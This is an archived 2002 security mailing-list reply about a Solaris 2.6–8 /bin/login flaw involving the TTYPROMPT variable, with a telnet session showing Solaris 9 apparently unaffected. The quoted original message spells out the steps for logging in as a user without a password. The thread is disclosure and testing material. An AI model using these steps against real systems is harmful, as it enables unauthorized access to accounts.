On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
>
> Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT. This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
> However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists. The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n". You will then be logged in as the user
> without any password authentication. This should work with any account
> except root (unless remote root login is allowed).
>
Looks like Solaris 9 is not vulnerable to this:

[idubrawselrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.

SunOS 5.9

login:

It automatically drops you to the login prompt. Perhaps this is fixed by a
patch that got rolled into 9?

Ido

-- 
===============================================================================
     			|Ido Dubrawsky		     E-mail: idubrawscisco.com
     |          |	|Network Consulting Engineer
    :|:        :|:	|VSEC Technical Marketing, SAFE Architecture
   :|||:      :|||:	|Cisco Systems, Inc.
.:|||||||:..:|||||||:.	|Austin, TX. 78759
===============================================================================

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (SunOS)

iD8DBQE9m0YKHhk5SQHyFEwRAgMOAKC/BmfJKEg5LmeUHVzVKSQnD2l+cwCglOkZ Fm+VzOrNfJoImHZdm+E7m60= =0dTH -----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]